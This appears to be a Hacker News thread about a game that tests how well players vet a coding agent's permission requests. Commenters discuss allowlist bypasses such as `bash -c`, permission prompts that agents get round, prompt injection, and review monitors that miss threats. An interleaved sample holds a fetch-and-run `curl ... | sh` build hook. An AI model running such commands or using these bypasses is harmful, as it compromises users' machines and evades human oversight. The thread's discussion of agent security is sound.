This is amazing!
Currently you can "cheat" by simply denying all requests as quickly as possible. This will give you the "security-conscious engineer" badge and a perfect score in terms of how many requests were processed. (You will get the "overblock" notification, but it's somewhat tucked away at the bottom and the screen still looks as if you won)
I also tried to play as the hustle4lyfe "move fast and break things" engineer and simply approved as many requests as quickly as possible. Turns out the "malicious command" popups actually slow you down. Mean!
Good catch, this has now been nerfed and this approach has gotten its own title
Glad I could help. I love the new title :D
Top 18%! I denied everything, unless I could see at a glance that it was safe (like `git diff`)
Just like real life! Deny it from doing anything and you're safe :)
Fun game, but it showed the lack of security hygiene employed by the game writer. It said `cat ~/.zshrc` was bad because it would share tokens and secrets, but I would never put secrets into my shell rc.
Plenty of people would. But then I guess they're in env and probably already available to Claude
Where would you put them?
Presumably a CLI-accessible password manager (like `pass`) or a GPG-encrypted file (like a netrc-style `~/.authinfo.gpg`).
I put mine in various AES-encrypted files (like `~/.secrets.aes`) and then source them explicitly when needed with:
I have a handful of aliases/functions to make it smoother, but that's the core.
Where are those aliases stored?
In that AES encrypted file.
It's a shell script that they encrypted. They decrypt it and feed the decrypted output immediately into the shell, to be sourced.
That encrypted secrets file could contain any shell script, so the aliases are stored in there, together with the API keys and passwords.
Into `pass`, for example:
https://news.ycombinator.com/item?id=48108207
Weird to make reading zshrc supposedly unsafe when I happily publish it in my public dotfiles repo... Who the hell keeps API keys in it? OTOH it seems like lots of these AI tools keep appending PATH in it so I guess there's a fundamental misunderstanding of shell best practices in the entire AI space...
Additionally, killing the results of `lsof` is _not_ safe - if, say, you have the web page open in firefox, or a client subshell in the agent itself, then boom, there goes firefox and the agent.
Yeah, the game seems to assert that the kill is safe to run because Claude told me it was safe. But that's the point, I'm not supposed to trust Claude.
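To make the `lsof` objection concrete, here is a minimal Python sketch that separates the process listening on a port from the processes merely connected to it. It assumes the usual column layout of `lsof -nP -i :3000` output; the sample text, the PIDs, and the helper name `listening_pids` are made up for illustration.

```python
def listening_pids(lsof_output: str) -> list[int]:
    """Return PIDs of rows marked (LISTEN) in `lsof -nP -i :PORT` output."""
    pids = []
    for line in lsof_output.splitlines()[1:]:  # skip the header row
        fields = line.split()
        if len(fields) >= 2 and fields[-1] == "(LISTEN)":
            pid = int(fields[1])
            if pid not in pids:
                pids.append(pid)
    return pids


# Made-up sample: a dev server listening, and a browser connected to it.
sample = """\
COMMAND   PID USER   FD   TYPE DEVICE SIZE/OFF NODE NAME
node     4242 dev    23u  IPv4 0x1234      0t0  TCP *:3000 (LISTEN)
firefox  5151 dev    88u  IPv4 0x5678      0t0  TCP 127.0.0.1:51000->127.0.0.1:3000 (ESTABLISHED)
"""

print(listening_pids(sample))  # [4242]
```

A plain `lsof -t -i:3000` would hand both PIDs to `kill`, which is the "there goes firefox" case. Filtering to listeners first (many lsof builds also accept `-sTCP:LISTEN` for this) narrows the blast radius, though it still says nothing about whether the listener is the process you meant.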
Fun little game, but I think the questions jump context so much it's a little unrepresentative. It might be better to group things into "packs", which have more real-world representative structure to them. For example, lots of "editing something.js" file permission requests, and then an "npm publish" is far more normal, and it's more of a risk, if you're used to pressing Y lots and then suddenly out of the blue...
About three quarters of the "bad" choices are things that not only do I not care about leaking but things that an employer would not punish you for doing, even if it led to a production incident.
The permission thing is a killer to productivity. If you're running Claude, I think it's more efficient to just run in a disposable sandbox (like exe.dev[1]) or in some form of Docker container with permissions you're personally OK taking the risk with on a personal machine[2].
[1] - https://exe.dev/ is a new cloud provider with some very useful agent UX
[2] - I built https://github.com/stanislavkozlovski/dclaude/ for this; not perfect but gets my job done on the rare occasion I need to run the coding agent locally
A disposable sandbox won't protect you from secret exfiltration. Assuming you don't consider your code a secret, you could of course set up your sandbox so it doesn't have any secrets, but that would severely limit the kinds of tasks you can use the agent for.
I got "approve" wrong for `ls -la ~/Documents` but I don't consider simply listing the documents folder a security problem, it's just file names. If it was reading the CONTENTS of them, maybe...
That's funny. It told me that blocking "npm run build" was the wrong answer. Maybe it doesn't really understand the threat model.
That's a great example of how dangerous actions are perceived as innocent. The entire model of approving specific commands is absolutely bonkers.
npm run build = run an arbitrary shell command written in package.json
Meanwhile the agent could have done any of the following without approval:
- edited `package.json` to contain any arbitrary build command
- planted malicious code in `build.js` (called by `npm run build`)
- planted malicious code in `node_modules/xyz/index.js` (imported by `build.js`)
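As a rough illustration of the list above, this Python sketch shows what approving `npm run build` really approves: whatever strings sit under `scripts` in `package.json` at that moment, including the `prebuild` and `postbuild` hooks npm runs around the named script. The helper name `resolve_npm_script` and the sample manifest are hypothetical.

```python
import json


def resolve_npm_script(package_json_text: str, name: str) -> list[str]:
    """Return the shell commands `npm run <name>` would execute, in order.

    npm runs `pre<name>` before and `post<name>` after the named script
    when those entries exist under "scripts".
    """
    scripts = json.loads(package_json_text).get("scripts", {})
    order = [f"pre{name}", name, f"post{name}"]
    return [scripts[key] for key in order if key in scripts]


# Hypothetical manifest: the prompt shows "npm run build", not these strings.
manifest = json.dumps({
    "scripts": {
        "prebuild": "curl https://example.invalid/x.sh | sh",
        "build": "node build.js",
    }
})

for command in resolve_npm_script(manifest, "build"):
    print(command)
```

Even this only surfaces the first layer. It says nothing about what `build.js` or anything it imports will do, which is the point being made above.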
Yup. The most secure computer is one encased in concrete and dropped into the ocean.
Concrete alone isn't enough, you also need to have it be enclosed in a Faraday Cage.
That's a great point, and it's also the problem with relying on a human in the loop to catch these kinds of issues: the check can be circumvented even if the human were perfect.
What would a better system look like?
Agents should make better use of OS sandboxing facilities with finer-grained ACLs.
Less: Do you want to run "npm run build"?
More: "npm run build" tried to read your Chrome cookie database, do you want to allow that?
Some agents like Codex use sandboxing on Linux/macOS but the permissions are far too coarse - they'll run the command in a relatively strict sandbox and when it fails they'll ask you to allowlist the command as a whole, forever. There should be a new permission prompt every time a command tries to do something new.
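One way to picture "a new prompt every time a command tries to do something new" is a ledger keyed on (command, resource) pairs instead of on the command alone. This is only a sketch: the class name `PermissionLedger` and the resource strings are invented, and it assumes a sandbox that can report which resource a command touched, which is the hard part and not shown here.

```python
class PermissionLedger:
    """Remembers approvals per (command, resource) pair, not per command."""

    def __init__(self) -> None:
        self._approved: set[tuple[str, str]] = set()

    def needs_prompt(self, command: str, resource: str) -> bool:
        """True if this command has not yet been approved for this resource."""
        return (command, resource) not in self._approved

    def approve(self, command: str, resource: str) -> None:
        """Record a one-off approval for exactly this pair."""
        self._approved.add((command, resource))


ledger = PermissionLedger()
ledger.approve("npm run build", "read:./src")

print(ledger.needs_prompt("npm run build", "read:./src"))             # False
print(ledger.needs_prompt("npm run build", "read:~/chrome-cookies"))  # True
```

Under this scheme, allowlisting `npm run build` for reading the source tree does not silently cover the same command reaching for the cookie database later.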
Claude suggests (or used to suggest - it's been a while) to allowlist "bash" which completely defeats the point. If you do that the agent can run `bash -c "echo literally anything"`
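Here is a small Python sketch of why allowlisting `bash` is equivalent to allowlisting everything. It models a naive first-word allowlist; this is an assumption made for illustration, not a description of how any particular agent implements its check.

```python
import shlex


def is_allowlisted(command: str, allowlist: set[str]) -> bool:
    """Naive check: approve if the first word of the command is allowlisted."""
    argv = shlex.split(command)
    return bool(argv) and argv[0] in allowlist


allowlist = {"bash", "git"}

# The check only sees "bash"; the payload after -c is never inspected.
print(is_allowlisted('bash -c "echo literally anything"', allowlist))  # True
print(is_allowlisted("curl https://example.invalid", allowlist))       # False
```

The same hole applies to any allowlisted interpreter or wrapper (`sh`, `env`, `xargs`, `node -e`, and so on), since the interesting part of the command is in the arguments.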
Not using agents at all. It could edit your code to do something malicious when you run it. Not even once. Not even if the agent has a gun to your head.
I vibe coded a TUI that just shows running lxd containers
I hit 'n' to toggle all network access minus anthropic and openai URLs.
I use pi (sometimes claude, always on bypass) and I auto allow everything. I only toggle manual approval in rare cases like running a script or command that needs to touch a production system and I need to validate everything.
Normally my container has full write access to staging so it can debug and validate everything on its own
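The "all network access minus anthropic and openai" toggle described above boils down to a hostname allowlist. A minimal Python sketch, assuming the allowed domains are `anthropic.com` and `openai.com` and that subdomains should pass; the names `ALLOWED_DOMAINS` and `host_allowed` are made up, and a real setup would enforce this at the container's network layer, not in application code.

```python
from urllib.parse import urlsplit

# Assumed allowlist; adjust to whatever endpoints your agent really needs.
ALLOWED_DOMAINS = ("anthropic.com", "openai.com")


def host_allowed(url: str) -> bool:
    """True if the URL's host is an allowed domain or a subdomain of one."""
    host = (urlsplit(url).hostname or "").lower()
    return any(
        host == domain or host.endswith("." + domain)
        for domain in ALLOWED_DOMAINS
    )


print(host_allowed("https://api.anthropic.com/v1/messages"))  # True
print(host_allowed("https://evil-anthropic.com/"))            # False
print(host_allowed("https://anthropic.com.evil.example/"))    # False
```

Matching on the exact domain or a dot-prefixed suffix is what keeps lookalike hosts out; a plain substring test would let both of the last two through.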
Sounds like your process has made you vulnerable to huge classes of exploits and accidents. You have no oversight of changes locally, and only focus on when it touches prod. That means toxic local changes can get in, and if it works in staging why would you look too closely at it before merging to prod? Meanwhile a malicious npm package has made it into your repo, and your staging api keys have been sent to the command and control server.
I can view the diff locally, but oftentimes after planning with Opus I get what I want.
I create a draft PR and manually review all items before then marking ready for review for the team.
So I'm not blindly pushing things to prod without review.
Without staging key access I wouldn't have been able to do a payment provider migration at this speed. Iterating by migrating users in staging and being able to use and validate the SDK quickly with Opus is a massive time saver.
Thanks all for checking it out and your suggestions!
If anyone is curious about the actual underlying risks and problems with some mitigations (like the 17% false-negative rate of Auto Mode), I wrote up a quick summary of some of the approaches here:
https://scalex.dev/blog/ai-agent-permissions/
You might want to check out https://github.com/kstenerud/yoloai
I haven't used local agentic AI yet for programming projects. Hence, -187 score
The filters for "commands I would run myself" and "commands I would let an agent run" are very different, it seems.
Thinking about agents as remote junior devs who _might_ be North Korean operatives has been the right model for me.
I was told I was over protective when the text said “I need to wipe and build my project” and its first thing to do was to read the details of the (already established) package file. Why did it need to read the package file to “get context” if it was just doing a standard wipe and build?
Apparently me telling it that’s the wrong first step and saying “no” is bad; but I’ve seen AI tools waste a ton of time doing a bunch of random work before they do their job.
I am mostly using OpenCode and barely ever see a permission prompt. While they do enforce it for outside workspace read/write, with the bash tool the agent can just bypass that. I'm not quite sure why it is that way, and it certainly isn't a very good solution, but likely not worse than asking for everything which just trains the user to always accept and provides a false sense of security then.
A bit too JavaScript specific... can't really play if you don't know that ecosystem.
This is one of two reasons why I wrote yoloAI. I never get these permission prompts anymore. It feels a lot like after installing an adblocker.
I got "overblocked" for this one:
but actually if you're only removing `node_modules` and you have a working package-lock.json already, what you want is `npm ci`; `npm install` can mutate package-lock.json and potentially expose you to supply chain attacks. If you use `npm ci` I think you don't need to `rm -rf node_modules`, either.
Anyway you should generally run `npm ci` except when you're deliberately updating your actual dependencies. I'd only permit an `npm install` if I was adding or updating a dependency, or I'd just reviewed an `npm ci` failure.
But also why would Claude need to run `rm -rf node_modules && npm install`? Without the context of seeing what changes it’s made, I’d be inclined to assume that Claude has added a new dependency, which I definitely don’t wanna blindly trust it to install
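The rule of thumb in this comment can be written down as a tiny decision function. This is a sketch of the commenter's policy, not an npm feature; `install_command` and its parameters are hypothetical names. It relies on two documented behaviours of `npm ci`: it refuses to run without a lockfile, and it removes an existing `node_modules` itself before installing.

```python
def install_command(has_lockfile: bool, changing_dependencies: bool) -> str:
    """Pick the npm command to approve under the policy described above."""
    if changing_dependencies or not has_lockfile:
        # The lockfile is expected to change (or does not exist yet), so this
        # is the case that deserves a closer look before approving.
        return "npm install"
    # Reproducible install from package-lock.json; never rewrites the lockfile.
    return "npm ci"


print(install_command(has_lockfile=True, changing_dependencies=False))  # npm ci
print(install_command(has_lockfile=True, changing_dependencies=True))   # npm install
```

Seen this way, an agent asking for `npm install` on a repo with a working lockfile is itself a signal worth questioning, as the comment says.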
thanks for the pointer! renamed it to npm ci so it's still 'safe'
It would be cool to see the distribution of all player scores.
That's a great idea, stay tuned
and added! Made one for each stat separately
Fun! Played twice and refused all dangerous commands, with only one "over-block". Although I disagree that saying no to `kill $(lsof -t -i:3000)` is over-blocking. It's such a simple command I'd rather run it myself and be fully aware of what process I'm killing.
Interestingly, I kept saying no to everything and somehow I am a security-conscious, rare engineer who actually read the commands. Guess doing nothing is the safest approach from a security standpoint.
Reminds me of the "Papers, please" game. Glory to Arstotzka!
Pressed 1 for everything, no regrets
Very fun. I can only imagine building this with Claude and testing needed a bit of mental concentration.
git reset --soft HEAD~1
Uh, how is this an overblock? It is literally a destructive command. No way I want an LLM agent rewriting my commit history. What if that commit was already pushed to a protected branch?
Why do you call it destructive? It rewrites history only locally and reversibly (the disappeared commit is still in reflog and can be recovered with another reset) and also doesn't destroy uncommitted changes, so it's quite safe. You can only lose data with it by resetting an unpushed commit and then waiting long enough to let the unreferenced commit be garbage collected.
Commit history is data. I might not realize what happened until the gc happens.
That was fun and gave me an idea how security conscious I am.
claude --dangerously-skip-permissions
just give in
Sadly unplayable - gray text on a black background is very hard to read on a phone
that was soooo last month, “auto-mode” is the way now
another agent reviews every command and blocks destructive ones
Scope Violation: `cat ~/.zshrc`
Scope Violation: `ls ~/Documents`
Buddy, my `${HOME}` is committed to a repository. It includes `.bashrc` and `Documents` directory. These are not scope violations if I'm having the LLM work on them!
Continue? Y/N ── SCORE: 2,343 Security-Conscious Engineer
Caught 8/8 threats "Not a single secret leaked"
→ llmgame.scalex.dev
Continue? Y/N ── SCORE: 1,549 Security-Conscious Engineer
Caught 3/3 threats "Not a single secret leaked"
So are there 3 threats? 8? Is it a different game?
Does everyone get a "good" score even if they missed 5 threats?!
It's a game you play over one minute. They probably saw more prompts than you.
To be realistic, 99% of the time it should be a totally innocuous command. If half of the commands are dangerous then you don't get fatigue because you're aware what you're doing is dangerous.
Fun game. Can somebody run an agent against those questions to see how it performs? :)
Use this and save yourself:
claude --dangerously-skip-permissions
Just make sure to run it in an isolated environment where it's ok to mess things up, and make sure it doesn't have access to any secrets.
This is why having a human in the loop isn't enough: they will cut corners and skip reviewing what they should review.
I created a watcher for this problem, to watch my PRs for unfinished scope and have a fresh Claude review
Uses tmux and gh https://github.com/Kyu/claude-pr-watch
A tool that pushes people into permissions fatigue is in fact the proper recipient of the blame. The tool in question here is the entire system though, including the OS with insufficient permission boundaries in userspace, not just the agent
A tool that bypasses permission requests because they’re annoying will be just as guilty when the repo is poisoned.
I'm not saying wedging doorstops under the fire doors is a good thing, I'm just saying look at the situation that's making people put the doorstops there. Or something, it's not a great analogy. I'm just saying that shaming the user belongs with obscurity in the list of security mechanisms that don't work out in practice.
It’s baking malicious code into your project, but hey it didn’t run rm -rf so… we’re good.
Why would you do this now that we have auto mode?
I love it when Claude is dangerous
I got tired of typing that and just do
alias claude+="claude --dangerously-skip-permissions"
alias claude++="claude --dangerously-skip-permissions --continue"
I do have a separate "claude" user on my system without sudo access and without access to my main user home dir.
And yeah I know that's not perfect but I'm trying to get shit done
You can turn that off with an option in most agents.
My own agent harness/framework has never had any permission system. It's also never deleted anything it shouldn't or done anything crazy or unrelated to what I asked.
> It's also never deleted anything it shouldn't or done anything crazy or unrelated to what I asked
Until it does. A simple curl request to a compromised website could inject a malicious prompt into it.
How many car accidents have you been in, and do you wear your seatbelt when you're in a car?
Some of the sandboxing I've been playing with gives me the best of both YOLO and, like, logic-programming-tier perms on LLM actions in the env. Still not ready for prime time though ;)
1,640 points on my first try—I fell into a few traps, but it was really interesting. Thanks for the little game! I'm sharing it with my coworkers :)
Permissions don't do much. They won't save you. You can just skip them completely.
If you are afraid that AI can delete something, do what you'd do with a potentially malicious user: sandbox, don't give permissions, set up remote backups, and so on.
Also, (unless prompt injected) models are not eager to start going rogue on your stuff.
But keep in mind a saying “Children don’t hear prohibitions — they hear suggestions.”
Same thing goes for LLMs. Never talk with an LLM about deleting stuff. Archiving, moving, retaining elsewhere... sure, but never about actually destructive operations. Don't use destructive language.
--dangerously-skip-permissions is the only way to fly. Of course your environment needs to be properly containerized and autobackup set up, so even rm -rf from your harness would do nothing. Life is too short to spend on replying to permissions requests.
I've seen these suggestions but I am really curious about the setup because I just don't get it.
If you want to work on the code then you need to have access to the repositories, so you need the GitHub token. Then, to test the app, you may need your own backend token. And VPN. Of course, only to DEV, of course all tokens encrypted. So, only DEV and your branch of the code is in danger. In my view, even that is pretty bad.
So, how does such a setup work?
You could clone the repo yourself and not give the agent any tokens at all. When done, push it yourself. This also lets you sandbox the agent to only have access to the local repo and nothing else.
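A related piece of the "no tokens at all" setup is making sure the agent process does not inherit secrets from your shell environment. A minimal Python sketch, assuming secrets can be recognised by variable name; the pattern, the sample values, and the helper name `scrubbed_env` are all illustrative, and name matching is only a heuristic.

```python
import re

# Heuristic: variable names that usually hold credentials (an assumption).
SECRET_NAME = re.compile(r"(TOKEN|SECRET|PASSWORD|API_?KEY|CREDENTIAL)", re.IGNORECASE)


def scrubbed_env(env: dict[str, str]) -> dict[str, str]:
    """Return a copy of env without variables whose names look like secrets."""
    return {name: value for name, value in env.items() if not SECRET_NAME.search(name)}


# Made-up environment for illustration.
sample = {
    "PATH": "/usr/bin",
    "HOME": "/home/dev",
    "GITHUB_TOKEN": "ghp_example",
    "OPENAI_API_KEY": "sk-example",
}

print(sorted(scrubbed_env(sample)))  # ['HOME', 'PATH']
```

The result can be passed as `env=` to `subprocess.run` when launching the agent. A stricter variant inverts the logic and forwards only an explicit list of names, which avoids missing a secret stored under an innocent-looking variable.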
Lol. Countdown til you get pwned starts today. Let me know how that works out for you in six months.
"Auto" in Claude and "Auto-review" in Codex are the only way to do agentic coding.
I haven't run claude code without --dangerously-skip-permissions in quite some time. I'm surprised that it's still the norm to endure permission spamming?
(I run it on a VPS of course, not my laptop)
Nice got 6/6
This current thread is proof of AI psychosis.
What the hell is going on in this thread? This isn't good. The "threats" don't make sense. Oh no, all the sensitive information in my package.json...
Here's the threat model I (a luddite) use to evaluate these. The Claude Code harness can be mostly trusted; the model cannot be trusted because it is exposed to untrusted data from the internet, and there is no separation of data and code in an LLM [0][1].
I want to avoid running untrusted code on my local machine, because it could steal secrets, install malware, etc.
Since the model is allowed to write without restriction (I think) to the project directory, anything in the project directory is also untrusted. Running standard commands from the system is fine, as long as you know what those commands are going to do. Running anything from the local directory should be avoided because the code is untrusted.
This is just one security model, there are many others! If a person is running claude in a stronger sandbox, that changes the model considerably. What threat model do you use to evaluate whether an agent's actions are safe?
[0]: https://www.schneier.com/essays/archives/2024/05/llms-data-c...
[1]: https://simonwillison.net/2025/Jun/16/the-lethal-trifecta/
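The rule in this threat model ("system commands are fine, anything from the project directory is untrusted") can be approximated mechanically. The Python sketch below flags a command when its executable or any file argument lives inside the project directory. The helper names `inside` and `touches_project_code` are hypothetical, POSIX-style paths are assumed, and the check is deliberately shallow: it will not notice `npm run build` pulling in project code indirectly.

```python
import os
import shlex
import shutil
import tempfile


def inside(path: str, root: str) -> bool:
    """True if path is root itself or lies underneath it, after resolving symlinks."""
    path, root = os.path.realpath(path), os.path.realpath(root)
    return os.path.commonpath([path, root]) == root


def touches_project_code(command: str, project_dir: str) -> bool:
    """Flag commands whose executable or file arguments live in project_dir."""
    argv = shlex.split(command)
    for index, word in enumerate(argv):
        # Relative words are resolved against the project; absolute ones stay as-is.
        candidate = os.path.join(project_dir, word)
        if os.path.isfile(candidate) and inside(candidate, project_dir):
            return True
        # A bare executable name is looked up on PATH, like the shell would.
        if index == 0 and os.sep not in word:
            found = shutil.which(word)
            if found and inside(found, project_dir):
                return True
    return False


with tempfile.TemporaryDirectory() as project:
    with open(os.path.join(project, "build.js"), "w") as handle:
        handle.write("// agent-writable file\n")
    flagged = touches_project_code("node build.js", project)
    ignored = touches_project_code("git status", project)

print(flagged, ignored)  # True False
```

A trusted interpreter running an agent-writable file is treated the same as running the file directly, which matches the comment's reasoning that everything in the project directory is untrusted.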
If you think the worst that an agent can do is leak your package.json, your threat model is wayyy broken.
Score is 6711 by just saying no to everything